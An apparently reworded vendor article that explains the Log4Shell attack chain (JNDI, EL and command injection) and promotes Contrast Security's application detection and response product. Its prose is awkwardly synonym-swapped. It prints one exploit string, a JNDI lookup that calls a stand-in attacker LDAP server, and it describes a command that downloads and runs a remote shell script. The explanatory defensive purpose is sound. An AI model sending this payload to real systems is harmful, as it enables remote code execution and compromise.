In the current swiftly evolving cyber peril panorama, organizations confront increasingly intricate invasions targeting their applications. Grasping these menaces and the technologies engineered to counter them is vital. This piece plunges into the inner workings of a habitual application invasion, utilizing the notorious Log4Shell vulnerability as an instance, showcasing how Application Detection and Response (ADR) technology effectively defends against such zero-day perils.
Peruse the Contrast ADR white paper
The configuration of a contemporary application invasion: Log4Shell
To depict the intricacy and seriousness of present-day application invasions, let’s scrutinize an invasion against the well-known Log4Shell vulnerability (CVE-2021-44228) that generated shockwaves across the cybersecurity domain in late 2021. This invasion serves as a prime illustration of invasion chaining, harnessing JNDI Injection, Expression Language (EL) Injection, and Command Injection.
Technological note: The CVE program compiled by MITRE documents computer security imperfections publicly, with each CVE entry having a distinct identifier to facilitate IT professionals in disseminating vulnerability information across diverse security tools and services.
Phase 1: Utilization of the vulnerability
The Log4Shell vulnerability impacts Log4j, a prevalent Java logging framework. The invasion commences when a malevolent actor dispatches a custom-crafted request to a susceptible application. This request embodies a Java Naming and Directory Interface (JNDI) lookup string in a structure like this:
${jndi:ldap://attacker-controlled-server.com/payload}
Technological note: JNDI (Java Naming and Directory Interface) constitutes a Java API bestowing naming and directory functionalities to Java applications, permitting them to unearth and scrutinize data and objects via a name, which can be exploited in certain vulnerabilities like Log4Shell. In this context, it’s manipulated to initiate a link to a malevolent server.
Phase 2: JNDI scrutiny and EL assessment
Upon processing this string, the vulnerable Log4j version construes the JNDI expression segment as an evaluation expression. This evaluation triggers the application to execute a JNDI lookup, extending to the attacker-manipulated Lightweight Directory Access Protocol (LDAP) server specified in the string.
Technological note: Log4j signifies a prevalent Java-centric logging framework crafted by Apache. It’s broadly employed in Java applications for logging varied data types and events.
Phase 3: Malevolent payload retrieval
The adversary’s LDAP server responds with an EL injection payload. Owing to the nature of JNDI and the processing of the response by Log4j, this payload is interpreted as an EL expression necessitating evaluation.
Phase 4: EL injection
Typically, the EL expression incorporates malicious code engineered to exploit the EL interpreter. This might encompass commands to download and enact additional malware, extract data, or establish an entry point in the system.
Technological note: Expression Language (EL) serves as a scripting language providing access to application data. EL injection arises when an attacker can influence or insert malevolent EL expressions, potentially leading to code execution. EL injection vulnerabilities manifest recurrently among zero-day vulnerabilities, either directly or indirectly through chained invasions as demonstrated here.
Phase 5: Code execution
As the EL interpreter assesses the inserted expression, it enacts the malicious code within the context of the compromised application. This affords the malefactor an entrypoint into the system, frequently with identical privileges as the application itself.
The capability and jeopardy of Log4Shell
What renders the Log4Shell vulnerability singularly severe is the extensive deployment of the Log4j library and the simplicity of exploiting the vulnerability. It raises the ensuing apprehensions:
- Broad invasion perimeter: Log4j finds application in numerous Java applications and frameworks, rendering this form of vulnerability prevalent.
- Distant code execution: The accompanying JNDI injection can lead directly to remote code execution (RCE), granting malefactors substantial control over the jeopardized system.
- Challenging detection: Invasions against the Log4Shell vulnerability can be obscured, complicating their identification through mere pattern matching of network-based defenses.
- Chained invasions: The JNDI injection invasion can be concatenated with other methodologies, such as EL injection and Command Injection, to craft more sophisticated invasions.
This anatomy of the Log4Shell invasion elucidates why application layer invasions are so potent and why protective mechanisms like Application Detection and Response (ADR) — detailed extensively below — are indispensable for detecting and preventing such sophisticated invasions.
Observe how to eradicate your application blindspot with Contrast ADR (video)
From entrypoint to objective execution
Upon establishing preliminary access, malefactors can leverage this stance to utilize supplementary tactics to fulfill other objectives, such as:
- Privilege escalation: The malefactor may exploit local vulnerabilitiesto obtain elevated privileges on the infiltrated system.
- Intel Gathering: Leveraging their escalated access, the assailant can explore the internal network to identify other susceptible systems or valuable information.
- Acquiring Credentials: The compromised system might be utilized to procure login details stored in memory or configuration files.
- Incursion into other systems: Through harvested credentials or exploiting other vulnerabilities, the attacker can breach additional systems within the network.
- Data Extraction or ransomware installation: Depending on their goals, attackers could filch sensitive information or deploy ransomware throughout the infiltrated network.
The constraints of current security methodologies
Before delving into the intricacies of ADR, it’s essential to grasp how it fills a notable void in the security strategies of many organizations: the deficiency in robust detection of threats at the application level.
Web app firewalls (WAFs)
Several organizations depend on WAFs as their main defense against application-level threats. Nonetheless, this strategy comes with numerous critical limitations:
- Network-centric focus: WAFs function at the network level, examining incoming traffic trends to detect potential threats. While this can work against known attack patterns, it offers minimal insight into the activities within the application itself.
- False alarms: Due to their lack of application-specific context, WAFs often produce a substantial number of false alarms. This can inundate security teams and lead to alert overload.
- Susceptibility to bypass techniques: WAF evasion techniques are surprisingly simple to implement. Intruders can frequently evade WAF protections using methods like encoding variations, evasion at the protocol level, or payload padding.
- Inadequate SOC integration: Even when organizations have WAFs implemented, they frequently neglect to set them up to supply detailed application-level data to their security operations center (SOC).
Technical pointer: A WAF is a security instrument that monitors, filters, and blocks HTTP traffic to and from a web application. It functions at the network level and aims to safeguard web applications from various assaults, such as Cross-Site Scripting (XSS) and SQL injection.
Technical pointer: WAF bypasses are methods assailants utilize to render WAF security controls ineffective. These include approaches to sneak malicious payloads past the WAF’s signature-based protections or entirely avoid the WAF entry point to the application. It is crucial to have a layered defense strategy when dealing with AppSec and not rely on a singular control to assure the security of the application layer.
Endpoint Detection and Response (EDR)
EDR solutions center on monitoring and safeguarding individual endpoints within an organization. While vital for overall security, EDR has its set of limitations concerning application security:
- Emphasis on endpoint actions: EDR primarily tracks system-level incidents and processes, not application-specific behaviors.
- Restricted insight into application interiors: EDR solutions lack visibility into the internal workings of applications.
- Responsive nature: EDR often identifies threats post their execution on an endpoint.
- Lacunae in cloud and web application coverage: As applications transition to cloud-based services, traditional EDR solutions might encounter gaps.
Technical pointer: EDR is a cybersecurity technology that continuously oversees and responds to threats on endpoint devices such as computers, laptops, and mobile devices. EDR solutions amass and analyze data from endpoints to empower security operations teams to identify, investigate, and mitigate suspicious activities and potential security breaches. They usually provide real-time visibility, threat detection, and automated response capabilities, focusing on endpoint-level activities rather than application-specific behaviors.
The ADR edge
ADR technology tackles these constraints by working within the application itself. This methodology offers various key benefits:
- Comprehensive application visibility: ADR offers insights into code execution and data flow, presenting a level of visibility that network-level solutions simply cannot equal.
- Context-aware identification: By comprehending the application’s behavior, ADR can more precisely differentiate between legitimate actions and real threats, significantly reducing false alarms.
- Protection against zero-day vulnerabilities: ADR’s thorough application understanding enables it to discover and counter novel attack patterns, rendering better protection against zero-day vulnerabilities.
- Layered defense for WAF circumvention: ADR acts as a critical secondary defense, capable of detecting threats that have evaded WAF protections successfully.
- Extensive, actionable insights: ADR can furnish detailed, context-rich intelligence about application-level threats directly to SOC teams, bridging the visibility gap and empowering more efficient threat response.
- By deploying ADR, organizations can bridge this crucial void in their security stance, acquiring the ability to perceive and counter sophisticated application-level threats that prevailing solutions might overlook.
Technical pointer: ADR is a security approach that centers on identifying and responding to threats at the application level. Unlike other AppSec measures that function at the network level, ADR operates within the application itself, offering deeper insights into application behavior and more precise threat detection.
Technical pointer: A zero-day vulnerability is a software securityerror that has not been discovered by the software vendor and has not been fixed yet. Attackers can exploit these weaknesses before the vendor notices them and rushes to resolve them.
Comparison of ADR in operation
Contrast Security utilizes innovative ADR technology to identify and prevent attacks like Log4Shell at various phases. Let’s delve into the structure that enables this and explore its practical implications.
Framework of Contrast ADR
Contrast ADR employs an architecture based on agents, integrating directly with the application runtime:
- Agent installation: A lightweight agent is embedded within the application’s runtime environment (e.g., Java Virtual Machine [JVM] for Java applications).
- Runtime integration: The agent smoothly integrates with the application code, enabling it to monitor and analyze application behavior in real time.
- Instrumentation: Contrast utilizes instrumentation methods to observe code execution, data flow, and API calls without altering the application’s source code.
- Response mechanism: When a threat is detected, Contrast can take immediate action, such as blocking malicious activities or notifying security teams.
Multi-layer defense against Log4Shell
Step 1: Identification of JNDI injection
Contrast Runtime Security spots the illicit JNDI lookup attempt by enhancing the security settings of the JVM to prevent misuse of JNDI capabilities.
Step 2: Detection of EL injection
Contrast Runtime Security identifies EL injection attempts and thwarts them by enhancing the JVM’s security settings to prevent exploitation of the JVM’s EL processor capabilities.
Step 3: Prevention of code execution
In the rare scenario of loading malicious code, the Contrast Runtime Security Platform employs:
- Protection against command injection: Using classification, tracing, and semantic analysis techniques to obstruct attacker payloads from accessing critical APIs.
- Enhanced security of processes: Boosting the security settings of the JVM to prevent misuse of the JVM’s critical APIs related to command execution.
Practical instance: Detection and analysis of Log4Shell attack
To comprehend how Contrast’s ADR technology is applied practically, let’s scrutinize a sequence of events from a simulated detection of a Log4Shell attack.
Remark: All behavioral regulations are in MONITOR mode, not BLOCK mode, for this example to illustrate the chaining of attacker exploits and Contrast’s ADR’s layered detection capabilities. Ordinarily, these regulations would be in BLOCK mode, capturing and stopping the initial JNDI exploit, thus preventing subsequent occurrences.
- JNDI injection identification: Contrast ADR pinpoints a JNDI injection attempt, detecting an endeavor to redirect an InitialContext lookup to an LDAP server controlled by the attacker.
- EL injection identification: ADR recognizes an EL injection incident, where the assessed expression utilizes Java class loading to invoke the JavaScript engine embedded in the JVM. The payload employs JavaScript to form a malicious array designed for executing system commands.
- Identification of command injection: Contrast ADR discovers a Command injection occurrence, where the command aims to download and execute a shell script from a server controlled by the attacker.
This comprehensive dissection showcases Contrast ADR’s capability to:
- Spot the initial JNDI injection attempt
- Follow the attack across multiple execution stages
- Recognize and scrutinize malicious payloads
- Offer deep insight into the attack chain, from the initial exploit to potential code execution
This level of understanding is crucial for preventing attacks and comprehending emerging threat models.
ADR reaction to Log4Shell assault
Upon detecting a potential Log4Shell exploitation attempt, Contrast ADR triggers an exhaustive response that aligns with the NIST Cybersecurity Framework:
Recognition
- Employs runtime Software Composition Analysis (SCA) to continuously map and inventory the application environment, identifying vulnerable Log4j instances.
- Offers real-time visibility into the application’s behavior and data flow during the attack endeavor.
Defense
- If in blocking
- In secure mode, the initial JNDI lookup to the malicious server is prevented.
- Improved JVM security settings are implemented to restrict JNDI capabilities, thereby reducing the attack surface.
Detection
- Recognition and notification are triggered upon the JNDI lookup attempt to the malevolent LDAP server.
- Detection of efforts to execute malevolent EL payloads.
- Surveillance of unauthorized Java class loading and execution.
- Identification of suspicious process executions indicating command injection.
Response
- Initiates the utilization of predefined run books for Log4Shell incidents.
- Delivers enhanced triaging context, encompassing detailed attack chain analysis and impacted application components.
- Integration with SIEM/XDR/SOAR systems, enhancing alerts with application-layer context for more efficient incident analysis.
Technological insight: SIEM (Security Information and Event Management) is a mechanism that accumulates and scrutinizes log data from diverse sources within an organization’s IT infrastructure. It aids in the real-time scrutiny of security alerts produced by applications and network hardware. Some examples of SIEM include Splunk, QRadar, and Microsoft Sentinel.
Technological insight: XDR (Extended Detection and Response) is an all-encompassing security tactic that assembles and automatically correlates data across various security layers – email, endpoints, servers, cloud workloads, and networks. It employs analytics to sense threats and automatically counteract them, offering a more inclusive and competent approach to detecting, investigating, and responding to cybersecurity incidents across the entire IT ecosystem.
Restoration
- Supports the investigation of incidents by providing elaborate forensic data regarding the attack attempt.
- Aids in determining the complete scope of potential compromise within the application portfolio.
- Eases post-incident scrutiny to enrich detection and protection capabilities.
- Furnishes data to underpin root cause analysis, aiding in preventing similar incidents in the future.
Throughout this process, the ADR system upholds continuous monitoring, supplies real-time updates to security dashboards, and aids in compliance reporting by documenting all undertaken detection and response actions.
Integration of ADR with SIEM/SOAR/XDR ecosystem
The melding of ADR technology with prevailing Security Information and Event Management (SIEM); security orchestration, automation, and response (SOAR); and Extended Detection and Response (XDR) systems establishes a potent synergy that enhances overall security operations. Here’s how ADR can seamlessly mesh and enhance SIEM/SOAR/XDR-driven workflows:
- Augmented incident response and analysis: ADR-generated alerts are correlated with network-level events in SIEM/SOAR/XDR, furnishing an extensive view of potential attacks and enabling more effective root cause analysis.
- Adaptable security control: SIEM/SOAR/XDR can dynamically switch ADR to blocking mode, deploy virtual patches, and activate enhanced logging.
- Harmonized threat mitigation: SIEM/SOAR/XDR coordinate the blocking of malevolent IP addresses and utilize ADR’s application-specific context for effective response strategies.
- Streamlined security-development collaboration: ADR generates vulnerability reports and integrates ticketing systems, fostering communication between security and development teams.
By amalgamating ADR into the SIEM/SOAR/XDR ecosystem, organizations achieve more comprehensive threat detection, swifter incident response, and more efficient vulnerability management, considerably enhancing their overall security stance.
Business advantages of ADR technology
Deploying Contrast’s ADR technology results in tangible business gains:
- Diminished risk: By offering multi-layered, context-aware defense, ADR significantly reduces the risk of successful attacks, safeguarding your organization’s data and reputation.
- Reduced total cost of ownership: With fewer false alarms and automated protection, security teams can concentrate on high-priority issues, curbing operational costs.
- Enhanced compliance status: ADR’s all-inclusive protection and detailed logging aid in meeting various compliance prerequisites, such as PCI DSS and GDPR.
- Swifter time-to-market: By fortifying applications from within, ADR empowers development teams to progress rapidly without compromising security standards, aligning with Secure by Design principles.
- Augmented visibility: The profound insights provided by ADR technology enrich overall security stance and inform strategic security decisions.
Information: PCI DSS (Payment Card Industry Data Security Standard) comprises a set of security criteria aimed at guaranteeing that all firms accepting, processing, storing, or transmitting credit card data maintain a secure environment.
Information: GDPR (General Data Protection Regulation) is a directive in EU law concerning data protection and privacy within the European Union and European Economic Area. It also tackles the transference of personal data outside the EU and EEA regions.
Summary
Amid evolving cyber threats, network-based application security strategies no longer suffice to safeguard critical applications and data. Contrast’s ADR technology furnishes a robust, intelligent, and proactive approach to application security.
By comprehending the structure of contemporary attacks and leveraging cutting-edge ADR solutions, organizations can vastly fortify their security posture, mitigate risk, and anticipate emerging threats. As a security decision-maker, investing in ADR technology transcends mere security precautions – it serves as a strategic necessity to safeguard your organization’s digital possessions in today’s threat landscape.
Next actions
To delve deeper into how ADR technology can fortify your organization and experience its capabilities firsthand, solicit a demo of Contrast ADR.
By undertaking these measures, you’re on the right path to fortifying your application security and outpacing evolving cyber threats.
Note: This contribution is from Jonathan Harper, Principal Solutions Engineer at Contrast Security, equipped with over five years of expertise in application security. Jonathan has assisted major enterprises and previously held positions at Threat Stack, Veracode, and Micron Technology.
Discovered this article engrossing? This article is a contributed piece from one of our esteemed partners. Track us on Twitter and LinkedIn to peruse more exclusive content we share.About Author
